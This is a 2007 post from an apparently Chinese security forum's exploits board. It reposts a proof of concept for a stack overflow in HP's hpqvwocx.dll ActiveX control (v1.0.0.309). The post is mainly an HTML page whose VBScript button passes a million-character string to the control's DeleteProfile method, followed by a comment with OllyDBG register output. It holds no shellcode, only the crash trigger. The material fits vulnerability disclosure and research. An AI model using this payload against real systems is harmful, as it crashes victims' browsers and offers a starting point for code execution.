Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-5-12 13:45 只看该作者

Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC

复制内容到剪贴板

代码:

<html>



<head>



 <title>



 Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309



 </title>



</head>



 



<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>



Tested in Windows XP Service Pack 2<br>



Discovered by Goodfellas Security Research Team<br>



Url ->[url]http://www.hp.com[/url]<br> author -> callAX<br>mail -> [email]callax@shellcode.com.ar[/email]<br>



[url]http://www.shellcode.com.ar[/url] / [url]http://www.securenetworks.ch[/url]</h4>



 



<object classid=&#39;clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D&#39; id=&#39;pAF&#39; ></object>



 



<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">



 



<script language="VBScript">



 



sub OuCh()



 



 Var_0 = String(1000000, "A")



 



 pAF.DeleteProfile Var_0



 



End Sub



 



 



</script>



 



</html>



 



<!--



 



Tested in OllyDBG 1.08b



 



TEST DWORD PTR DS:[ECX],EAX



 



EAX -> 000ED484



ECX -> 000425F4



EDX -> 00000000



EBX -> 00000000



EIP -> 04B47B97



 



Sub DeleteProfile (



      ByVal Name As String



)



 



-->

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC